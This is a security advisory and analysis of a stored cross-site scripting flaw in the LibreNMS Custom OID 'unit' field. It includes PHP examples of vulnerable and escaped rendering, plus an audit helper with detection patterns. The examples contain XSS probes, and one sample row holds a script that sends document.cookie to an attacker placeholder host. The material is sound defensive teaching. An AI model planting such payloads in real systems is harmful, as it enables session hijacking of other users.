CVE-2026-27016 in LibreNMS

Summary

by MITRE • 02/20/2026

LibreNMS is an auto-discovering PHP/MySQL/SNMP based network monitoring tool. Versions 24.10.0 through 26.1.1 are vulnerable to Stored XSS via the unit parameter in Custom OID. The Custom OID functionality lacks strip_tags() sanitization while other fields (name, oid, datatype) are sanitized. The unsanitized value is stored in the database and rendered without HTML escaping. This issue is fixed in version 26.2.0.


Analysis

by VulDB Data Team • 02/20/2026

CVE-2026-27016 affects LibreNMS, a widely used network monitoring platform built on PHP, MySQL and SNMP that provides automated device discovery and monitoring. The flaw sits in the Custom OID feature, which lets administrators define additional SNMP object identifiers to poll on specific devices. It is a stored cross-site scripting weakness: a user who is allowed to create or edit a Custom OID entry can place script-bearing HTML into the database, and that markup later runs in the browser of anyone who views the affected entry.

The defect is inconsistent input handling within the Custom OID implementation. The name, oid and datatype parameters are passed through strip_tags(), but the unit parameter is not, so HTML submitted in that field is written to the MySQL database unchanged. Because the stored value is then emitted into the page without HTML escaping, the browser parses it as markup and executes any script it carries in the victim's session. From there an attacker can read session cookies that are not marked HttpOnly, redirect the user, or issue requests to LibreNMS with the victim's privileges. The missing strip_tags() call is the immediate gap, but the underlying weakness is the unescaped output: stripping tags on input does not protect a value that is later placed into an attribute or script context.
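The pattern described above, reduced to a small runnable model. This is added here as an illustration and is not LibreNMS code: the field handling, the function names and the title-attribute rendering location are assumptions, and the submitted values are constructed.

```php
<?php
// Illustrative model of the inconsistent-sanitization pattern (hypothetical
// code, not LibreNMS's own). Field names and functions are assumptions.

declare(strict_types=1);

// Constructed sample of a Custom OID form submission. The unit value is an
// XSS probe; name, oid and datatype are benign apart from a stray tag.
$submitted = [
    'name'     => 'Chassis <b>temp</b>',
    'oid'      => '.1.3.6.1.4.1.9.9.13.1.3.1.3.1',
    'datatype' => 'GAUGE',
    'unit'     => '°C<img src=x onerror=alert(document.cookie)>',
];

// Vulnerable model: strip_tags() applied to three fields, unit forgotten.
function storeVulnerable(array $in): array
{
    return [
        'name'     => strip_tags($in['name']),
        'oid'      => strip_tags($in['oid']),
        'datatype' => strip_tags($in['datatype']),
        'unit'     => $in['unit'],          // gap: stored verbatim
    ];
}

// Vulnerable render: stored values concatenated straight into HTML.
function renderVulnerable(array $row): string
{
    return "<td>{$row['name']}</td><td>{$row['oid']}</td>"
         . "<td>{$row['datatype']}</td><td>{$row['unit']}</td>";
}

// Hardened: escape every value at the HTML output boundary, regardless of
// what was or was not stripped on input. ENT_QUOTES covers both quote styles,
// so the same helper is safe inside double- and single-quoted attributes.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function renderHardened(array $row): string
{
    return '<td>' . h($row['name']) . '</td><td>' . h($row['oid']) . '</td>'
         . '<td>' . h($row['datatype']) . '</td><td>' . h($row['unit']) . '</td>';
}

// Why strip_tags() alone is not the right fix: it only removes tags, so a
// value that lands in an attribute context can still close the attribute.
// The title attribute here is a hypothetical second rendering location.
function renderTitleStripped(array $row): string
{
    $u = strip_tags($row['unit']);
    return '<span title="' . $u . '">' . $u . '</span>';
}

function renderTitleEscaped(array $row): string
{
    return '<span title="' . h($row['unit']) . '">' . h($row['unit']) . '</span>';
}

$row = storeVulnerable($submitted);
echo renderVulnerable($row), PHP_EOL;   // the unit's <img ... onerror=...> is emitted as live markup
echo renderHardened($row), PHP_EOL;     // every '<', '>' and quote arrives as an entity and renders as text

// A tag-free probe: strip_tags() leaves it untouched, and in an attribute
// context the leading quote terminates title="..." and adds an event handler.
$attrProbe = ['unit' => '" onmouseover="alert(1)'];
echo renderTitleStripped($attrProbe), PHP_EOL;
echo renderTitleEscaped($attrProbe), PHP_EOL;   // quotes become &quot;, attribute stays intact
```

The two render functions are the point: the stored data is identical in both cases, and only the one that escapes at output time is safe. Fixing the input filter closes this particular report; escaping at render time closes the class.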

For organizations running LibreNMS, the operational impact is that a single malicious Custom OID entry gives an attacker a persistent foothold in the monitoring UI. Because the payload is stored, it fires every time the affected entry is rendered, across sessions and users, until it is removed; if the viewer is an administrator, the injected script acts with administrative privileges and can alter monitoring configuration or create further entries. Exploitation requires an authenticated account that is permitted to edit Custom OIDs, so the exposure is greatest where that right is granted broadly or where a lower-privileged account can be used to target administrators. The vulnerability affects versions 24.10.0 through 26.1.1, so any installation on those releases that has not yet upgraded is affected.

The primary mitigation is to upgrade to LibreNMS 26.2.0, which closes the sanitization gap in the Custom OID form. Because an upgrade fixes the code and not the stored data, administrators should also review existing Custom OID entries and remove or correct any whose unit value contains angle brackets, quotes, event-handler attributes or a javascript: scheme. A web application firewall can add a layer of defense by blocking obvious payloads, and a Content-Security-Policy that disallows inline scripts limits what a stored payload can do even if it reaches the page. The vulnerability aligns with CWE-79 (Improper Neutralization of Input During Web Page Generation, 'Cross-site Scripting') and is mapped to ATT&CK techniques T1566.001 (Phishing: Spearphishing Attachment) and T1059.007 (Command and Scripting Interpreter: JavaScript). For developers, the durable fix is contextual output encoding at the template layer (escaping every value when it is rendered, for example with Blade's {{ }} syntax or htmlspecialchars()), with input filtering such as strip_tags() treated as a secondary control; per-field input sanitization is exactly what allowed one forgotten field to become exploitable.
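An audit helper for the review step above, added here as an example and not taken from LibreNMS. It flags stored unit values that carry markup, event-handler attributes, a javascript: scheme, encoded angle brackets or attribute-breaking quotes. The row shape and column names are assumptions, and the rows are constructed stand-ins for a result set read from the Custom OID table.

```php
<?php
// Hypothetical audit helper (not part of LibreNMS). Column names
// customoid_id, device_id and unit are assumptions about the row shape.

declare(strict_types=1);

function isSuspiciousUnit(string $unit): bool
{
    // A unit label should look like "°C", "Mbps" or "%". Anything that could
    // be parsed as markup, or that could escape an attribute, is flagged.
    $patterns = [
        '/<\s*\/?\s*[a-z!\/?]/i',     // opening/closing tag, comment, doctype
        '/\bon[a-z]+\s*=/i',          // event handler attribute (onerror=, onload=)
        '/javascript\s*:/i',          // javascript: URL scheme
        '/&(?:lt|#0*60|#x0*3c);/i',   // entity-encoded '<'
        '/%3c/i',                     // percent-encoded '<'
        '/["\']/',                    // quotes that could terminate an attribute
    ];
    foreach ($patterns as $re) {
        if (preg_match($re, $unit) === 1) {
            return true;
        }
    }
    return false;
}

/**
 * Returns the subset of rows whose unit value is suspicious.
 * @param iterable<array{customoid_id:int, device_id:int, unit:string}> $rows
 * @return array<int, array{customoid_id:int, device_id:int, unit:string}>
 */
function auditCustomOidUnits(iterable $rows): array
{
    $flagged = [];
    foreach ($rows as $row) {
        if (isSuspiciousUnit((string) $row['unit'])) {
            $flagged[] = $row;
        }
    }
    return $flagged;
}

// Constructed sample rows standing in for a SELECT over the Custom OID table.
$rows = [
    ['customoid_id' => 1, 'device_id' => 7,  'unit' => '°C'],
    ['customoid_id' => 2, 'device_id' => 7,  'unit' => 'Mbps'],
    ['customoid_id' => 3, 'device_id' => 9,  'unit' => '%<script>fetch("//attacker.example/?c="+document.cookie)</script>'],
    ['customoid_id' => 4, 'device_id' => 9,  'unit' => 'W" onmouseover="alert(1)'],
    ['customoid_id' => 5, 'device_id' => 12, 'unit' => 'dBm'],
    ['customoid_id' => 6, 'device_id' => 12, 'unit' => 'V&lt;svg onload=alert(1)&gt;'],
];

// Rows 3, 4 and 6 are reported; the plain unit labels pass.
foreach (auditCustomOidUnits($rows) as $hit) {
    printf("customoid_id=%d device_id=%d unit=%s\n",
        $hit['customoid_id'], $hit['device_id'], $hit['unit']);
}
```

In practice the rows would come from a PDO query against the LibreNMS database; the exact table and column names should be taken from the installed schema rather than from this example. The quote pattern is deliberately strict and may flag a legitimate unit such as a feet or inches mark, which is the right trade-off for a one-off review of a small table.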

Responsible

GitHub M

Reservation

02/17/2026

Disclosure

02/20/2026

Moderation

accepted

CPE

ready

EPSS

0.00004

KEV

no

Activities

very low
